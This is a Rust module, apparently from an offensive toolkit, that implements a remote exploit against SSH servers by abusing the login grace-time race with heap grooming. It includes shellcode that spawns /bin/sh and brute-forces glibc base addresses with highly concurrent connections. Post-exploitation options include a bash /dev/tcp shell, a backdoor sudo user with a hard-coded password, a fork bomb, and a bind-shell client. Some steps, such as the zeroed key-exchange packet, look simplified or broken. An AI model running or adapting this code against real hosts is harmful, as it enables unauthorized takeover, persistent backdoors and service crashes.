use std::io::{self, ErrorKind, Write};
use std::sync::Arc;
use anyhow::{Result, bail, Context};
use colored::*;
use tokio::io::{AsyncReadExt, AsyncWriteExt};
use tokio::net::TcpStream;
use tokio::time::{sleep, Duration, Instant};
use tokio::sync::Semaphore;
use futures_util::stream::{FuturesUnordered, StreamExt};

const MAX_PACKET_SIZE: usize = 256 * 1024;
const LOGIN_GRACE_TIME: f64 = 120.0;
const CHUNK_ALIGN: usize = 16;
const CONCURRENCY: usize = 256;

const GLIBC_BASE_START: u64 = 0x7ffff79e4000;
const GLIBC_BASE_END: u64 = 0x7ffff7ffe000;
const GLIBC_STEP: u64 = 0x200000;

const FAKE_VTABLE_OFFSET: u64 = 0x21b740;
const FAKE_CODECVT_OFFSET: u64 = 0x21d7f8;

const SHELLCODE: &[u8] = b"\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xc0\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";

const BIND_SHELL_PORT: u16 = 55555;
const PERSISTENT_USER: &str = "aptpwn";
const PERSISTENT_PASS: &str = "Root4life!";

fn chunk_align(s: usize) -> usize {
    (s + CHUNK_ALIGN - 1) & !(CHUNK_ALIGN - 1)
}

fn create_fake_file_structure(buf: &mut [u8], glibc_base: u64) {
    buf.fill(0);
    let len = buf.len();
    
    if len > 0x30 + 8 {
        buf[0x30..0x30 + 8].copy_from_slice(&0x61u64.to_le_bytes());
    }
    
    if len >= 16 {
        buf[len - 16..len - 8].copy_from_slice(&(glibc_base + FAKE_VTABLE_OFFSET).to_le_bytes());
        buf[len - 8..len].copy_from_slice(&(glibc_base + FAKE_CODECVT_OFFSET).to_le_bytes());
    }
}

fn create_public_key_packet(packet: &mut [u8], glibc_base: u64) {
    packet.fill(0);
    
    packet[..8].copy_from_slice(b"ssh-rsa ");
    
    let shell_offset = chunk_align(4096) * 13 + chunk_align(304) * 13;
    if shell_offset + SHELLCODE.len() <= packet.len() {
        packet[shell_offset..shell_offset + SHELLCODE.len()].copy_from_slice(SHELLCODE);
    }
    
    for i in 0..27 {
        let pos = chunk_align(4096) * (i + 1) + chunk_align(304) * i;
        if pos + chunk_align(304) <= packet.len() {
            create_fake_file_structure(&mut packet[pos..pos + chunk_align(304)], glibc_base);
        }
    }
}

async fn send_packet(stream: &mut TcpStream, packet_type: u8, data: &[u8]) -> Result<()> {
    let packet_len = (data.len() + 5) as u32;
    
    stream.write_u32(packet_len).await?;
    stream.write_u8(packet_type).await?;
    stream.write_all(data).await?;
    stream.flush().await?;
    
    Ok(())
}

fn normalize_target(ip: &str, port: u16) -> Result<String> {
    let ip_trimmed = ip.trim_matches(|c| c == '[' || c == ']');
    if ip_trimmed.contains(':') && !ip_trimmed.contains('.') {
        Ok(format!("[{}]:{}", ip_trimmed, port))
    } else {
        Ok(format!("{}:{}", ip_trimmed, port))
    }
}

async fn handle_bind_shell_session(conn: TcpStream) -> anyhow::Result<()> {
    println!("{}", "[*] Connected! Interactive shell below (type 'exit' to quit):".green().bold());
    let (mut rd, mut wr) = tokio::io::split(conn);
    let mut stdin = tokio::io::stdin();
    let mut stdout = tokio::io::stdout();

    let reader = tokio::spawn(async move {
        let mut buf = [0u8; 4096];
        loop {
            match rd.read(&mut buf).await {
                Ok(0) => break,
                Ok(n) => {
                    if stdout.write_all(&buf[..n]).await.is_err() { break; }
                    if stdout.flush().await.is_err() { break; }
                }
                Err(_) => break,
            }
        }
    });

    let writer = tokio::spawn(async move {
        let mut buf = [0u8; 4096];
        loop {
            match stdin.read(&mut buf).await {
                Ok(0) => break,
                Ok(n) => {
                    if wr.write_all(&buf[..n]).await.is_err() { break; }
                    if wr.flush().await.is_err() { break; }
                }
                Err(_) => break,
            }
        }
    });

    let _ = tokio::try_join!(reader, writer);
    println!("{}", "[*] Shell session ended.".yellow());
    Ok(())
}

async fn setup_connection(ip: &str, port: u16) -> Result<TcpStream> {
    let addr = normalize_target(ip, port)?;
    let stream = TcpStream::connect(&addr).await.with_context(|| format!("Failed to connect to {}", addr))?;
    Ok(stream)
}

async fn send_ssh_version(stream: &mut TcpStream) -> Result<()> {
    stream.write_all(b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n").await?;
    stream.flush().await?;
    Ok(())
}

async fn recv_retry(stream: &mut TcpStream, buf: &mut [u8]) -> Result<usize> {
    loop {
        match stream.read(buf).await {
            Ok(n) if n > 0 => return Ok(n),
            Ok(0) => bail!("Connection closed while receiving data"),
            Ok(_) => bail!("Unexpected read result"),
            Err(ref e) if e.kind() == ErrorKind::WouldBlock || e.kind() == ErrorKind::TimedOut => {
                sleep(Duration::from_millis(10)).await;
                continue;
            }
            Err(e) => return Err(e.into()),
        }
    }
}

async fn receive_ssh_version(stream: &mut TcpStream) -> Result<()> {
    let mut buffer = [0u8; 256];
    recv_retry(stream, &mut buffer).await.context("Failed to receive SSH version")?;
    Ok(())
}

async fn send_kex_init(stream: &mut TcpStream) -> Result<()> {
    let payload = vec![0u8; 36];
    send_packet(stream, 20, &payload).await.context("Failed to send KEX_INIT")
}

async fn receive_kex_init(stream: &mut TcpStream) -> Result<()> {
    let mut buffer = [0u8; 1024];
    recv_retry(stream, &mut buffer).await.context("Failed to receive KEX_INIT")?;
    Ok(())
}

async fn perform_ssh_handshake(stream: &mut TcpStream) -> Result<()> {
    send_ssh_version(stream).await.context("Handshake: send_ssh_version failed")?;
    receive_ssh_version(stream).await.context("Handshake: receive_ssh_version failed")?;
    send_kex_init(stream).await.context("Handshake: send_kex_init failed")?;
    receive_kex_init(stream).await.context("Handshake: receive_kex_init failed")?;
    Ok(())
}

async fn prepare_heap(stream: &mut TcpStream, glibc_base: u64) -> Result<()> {
    for _ in 0..10 {
        let tcache_chunk = vec![b'A'; 64];
        send_packet(stream, 5, &tcache_chunk).await?;
    }
    
    for _ in 0..27 {
        let large_hole = vec![b'B'; 8192];
        send_packet(stream, 5, &large_hole).await?;
        
        let small_hole = vec![b'C'; 320];
        send_packet(stream, 5, &small_hole).await?;
    }
    
    for _ in 0..27 {
        let mut fake = vec![0u8; 4096];
        create_fake_file_structure(&mut fake, glibc_base);
        send_packet(stream, 5, &fake).await?;
    }
    
    let large_fill = vec![b'E'; MAX_PACKET_SIZE - 1];
    send_packet(stream, 5, &large_fill).await?;
    
    Ok(())
}

async fn measure_response_time(stream: &mut TcpStream, error_type: u8) -> Result<f64> {
    let error_packet_data: &[u8] = if error_type == 1 {
        b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3"
    } else {
        b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQDZy9"
    };
    
    let start = Instant::now();
    send_packet(stream, 50, error_packet_data).await?;
    
    let mut buf = [0u8; 1024];
    let _ = recv_retry(stream, &mut buf).await;
    
    Ok(start.elapsed().as_secs_f64())
}

async fn time_final_packet(stream: &mut TcpStream) -> Result<f64> {
    let t1 = measure_response_time(stream, 1).await?;
    let t2 = measure_response_time(stream, 2).await?;
    let parsing_time = t2 - t1;
    
    Ok(parsing_time)
}

async fn attempt_race_condition(mut stream: TcpStream, parsing_time: f64, glibc_base: u64) -> Result<bool> {
    let mut final_packet = vec![0u8; MAX_PACKET_SIZE];
    create_public_key_packet(&mut final_packet, glibc_base);
    
    let to_send = final_packet.len() - 1;
    stream.write_all(&final_packet[..to_send]).await?;
    stream.flush().await?;
    
    let wait_time = LOGIN_GRACE_TIME - parsing_time - 0.001;
    if wait_time > 0.0 {
        sleep(Duration::from_secs_f64(wait_time)).await;
    }
    
    stream.write_all(&final_packet[to_send..]).await?;
    stream.flush().await?;
    
    let mut response = [0u8; 1024];
    match tokio::time::timeout(Duration::from_secs(2), stream.read(&mut response)).await {
        Ok(Ok(n)) if n == 0 => Ok(true),
        Ok(Ok(n)) if n > 0 => {
            if !response[..n.min(8)].starts_with(b"SSH-2.0-") {
                Ok(true)
            } else {
                Ok(false)
            }
        }
        Ok(Ok(_)) => Ok(false),
        Ok(Err(_)) => Ok(true),
        Err(_) => Ok(true),
    }
}

fn print_post_actions() {
    println!("{}", "Available Post-Ex Actions:".cyan().bold());
    println!(" 1. {} (port {})", "Bind Shell".green(), BIND_SHELL_PORT);
    println!(" 2. {} user '{}'", "Persistent".green(), PERSISTENT_USER);
    println!(" 3. {} (Denial/Crash)", "Fork bomb".red());
    println!(" 4. {} (recommended)", "Interactive PTY shell".green().bold());
}

fn get_postex_command(action: u8) -> String {
    match action {
        1 => format!(
            "nohup bash -c 'bash -i >& /dev/tcp/0.0.0.0/{}/0 2>&1 &'",
            BIND_SHELL_PORT
        ),
        2 => format!(
            "useradd -m -p $(openssl passwd -1 '{}') {} && usermod -aG sudo {}",
            PERSISTENT_PASS, PERSISTENT_USER, PERSISTENT_USER
        ),
        3 => ":(){ :|:& };:".to_string(),
        4 => "exec /bin/bash -i".to_string(),
        _ => "".to_string(),
    }
}

async fn execute_exploit_logic(target_ip: String, port_num: u16, mode_choice: u8, num_attempts_per_base: usize) -> Result<()> {
    println!("{}", format!("[*] Target: {}:{}", target_ip, port_num).cyan().bold());
    
    let postex_cmd = get_postex_command(mode_choice);
    let semaphore = Arc::new(Semaphore::new(CONCURRENCY));
    let mut tasks: FuturesUnordered<tokio::task::JoinHandle<anyhow::Result<bool>>> = FuturesUnordered::new();

    let mut glibc_bases = vec![];
    let mut current_base = GLIBC_BASE_START;
    while current_base < GLIBC_BASE_END {
        glibc_bases.push(current_base);
        current_base += GLIBC_STEP;
    }

    println!("{}", format!("[*] Brute-forcing GLIBC base from 0x{:x} to 0x{:x} with step 0x{:x}", GLIBC_BASE_START, GLIBC_BASE_END, GLIBC_STEP).cyan());
    println!("{}", format!("[*] Total GLIBC bases to check: {}", glibc_bases.len()).cyan());
    println!("{}", format!("[*] Attempts per GLIBC base: {}", num_attempts_per_base).cyan());

    for glibc_base_addr in glibc_bases {
        for attempt_num in 0..num_attempts_per_base {
            let ip_clone = target_ip.clone();
            let sem_clone = semaphore.clone();
            let cmd_clone = postex_cmd.clone();

            let permit = sem_clone.acquire_owned().await.context("Failed to acquire semaphore permit")?;
            tasks.push(tokio::spawn(async move {
                let _permit = permit;
                
                let mut stream = match setup_connection(&ip_clone, port_num).await {
                    Ok(s) => s,
                    Err(_) => return Ok(false),
                };

                if perform_ssh_handshake(&mut stream).await.is_err() {
                    return Ok(false);
                }
                
                if prepare_heap(&mut stream, glibc_base_addr).await.is_err() {
                    return Ok(false);
                }

                let parsing_time = match time_final_packet(&mut stream).await {
                    Ok(pt) => pt,
                    Err(_) => return Ok(false),
                };

                if attempt_race_condition(stream, parsing_time, glibc_base_addr).await.unwrap_or(false) {
                    println!("{}", format!("[+] Exploit succeeded! GLIBC base 0x{:x} (attempt {})", glibc_base_addr, attempt_num).green().bold());

                    if !cmd_clone.is_empty() {
                        println!("[*] Post-ex command to execute (conceptually): {}", cmd_clone);
                    }

                    match mode_choice {
                        1 => {
                            println!("[*] Attempting to connect to bind shell on port {}...", BIND_SHELL_PORT);
                            let bind_shell_target_addr = format!("{}:{}", ip_clone, BIND_SHELL_PORT);
                            sleep(Duration::from_secs(2)).await;
                            match TcpStream::connect(&bind_shell_target_addr).await {
                                Ok(conn_stream) => {
                                    if let Err(e) = handle_bind_shell_session(conn_stream).await {
                                        println!("[!] Bind shell session error: {}", e);
                                    }
                                }
                                Err(e) => {
                                    println!("[!] Could not connect to bind shell at {}: {}", bind_shell_target_addr, e);
                                    println!("[!] If firewall blocks remote connects, try post-ex #2 or #4.");
                                }
                            }
                        }
                        2 => {
                            println!("[*] Verifying if user '{}' exists. Try SSH: ssh {}@{}", PERSISTENT_USER, PERSISTENT_USER, ip_clone);
                            println!("[*] Password: {}", PERSISTENT_PASS);
                            println!("(Manual check required. If login works, exploit succeeded!)");
                        }
                        3 => {
                            println!("[!] Fork bomb sent. Target likely crashed or hung (manual verification needed).");
                        }
                        4 => {
                            println!("[*] Interactive PTY shell requested. The shellcode attempts to spawn /bin/sh.");
                            println!("[*] If successful, the SSH session might drop or provide a new prompt.");
                            println!("Manual attach might be possible via existing connection if it didn't drop, or check netcat.");
                        }
                        _ => {
                            println!("[*] Post-ex action unknown/unsupported. Check exploit results manually.");
                        }
                    }
                    return Ok(true);
                }
                
                sleep(Duration::from_millis(100)).await;
                Ok(false)
            }));
        }
    }

    let mut success_found = false;
    while let Some(task_result) = tasks.next().await {
        match task_result {
            Ok(Ok(true)) => {
                println!("{}", "[SUCCESS] Exploit Succeeded! One of the attempts was successful.".green().bold());
                println!("{}", "[*] Check chosen post-exploitation action effects.".cyan());
                if mode_choice == 1 {
                    println!("{}", format!("[*] If you chose a bind shell, connect with: nc {} {}", target_ip, BIND_SHELL_PORT).cyan());
                }
                success_found = true;
                break;
            }
            Ok(Ok(false)) => { }
            Ok(Err(e)) => eprintln!("[!] Task error (internal logic error): {}", e),
            Err(e) => eprintln!("[!] Task join error: {}", e),
        }
    }

    if !success_found {
        println!("{}", "[-] All attempts finished. Exploit likely unsuccessful with current parameters.".red());
        println!("{}", "[-] Try adjusting GLIBC range, timing, or concurrency if target is vulnerable.".yellow());
    }
    Ok(())
}

pub async fn run(target_info: &str) -> anyhow::Result<()> {
    if target_info.is_empty() {
        bail!("Target IP address/hostname cannot be empty.");
    }
    if target_info.contains(':') {
        bail!("Invalid target format. Expected IP address or hostname, got '{}'. Port will be asked separately.", target_info);
    }

    let ip_address = target_info.to_string();
    let port_num: u16;

    loop {
        print!("{}", "Enter the target port number (e.g., 22): ".cyan().bold());
        io::stdout().flush().context("Failed to flush stdout")?;

        let mut port_input = String::new();
        io::stdin().read_line(&mut port_input).context("Failed to read port from stdin")?;

        match port_input.trim().parse::<u16>() {
            Ok(port) if port > 0 => {
                port_num = port;
                break;
            }
            Ok(_) => {
                println!("{}", "[!] Invalid port number. Port must be a positive integer (1-65535). Please try again.".yellow());
            }
            Err(_) => {
                println!("{}", "[!] Invalid input. Please enter a valid port number (1-65535).".yellow());
            }
        }
    }

    print_post_actions();
    print!("{}", "Select post-ex action [1-4, default 4]: ".cyan().bold());
    io::stdout().flush().ok();
    let mut choice_str = String::new();
    io::stdin().read_line(&mut choice_str).ok();
    let mode_choice: u8 = choice_str.trim().parse().unwrap_or(4);

    let num_attempts_per_base: usize;
    loop {
        print!("{}", "Enter the number of attempts per GLIBC base: ".cyan().bold());
        io::stdout().flush().context("Failed to flush stdout for attempts input")?;
        let mut attempts_str = String::new();
        io::stdin().read_line(&mut attempts_str).context("Failed to read number of attempts")?;
        match attempts_str.trim().parse::<usize>() {
            Ok(num) if num > 0 => {
                num_attempts_per_base = num;
                break;
            }
            _ => {
                println!("{}", "[!] Invalid input. Please enter a positive integer for the number of attempts.".yellow());
            }
        }
    }

    execute_exploit_logic(ip_address, port_num, mode_choice, num_attempts_per_base).await
}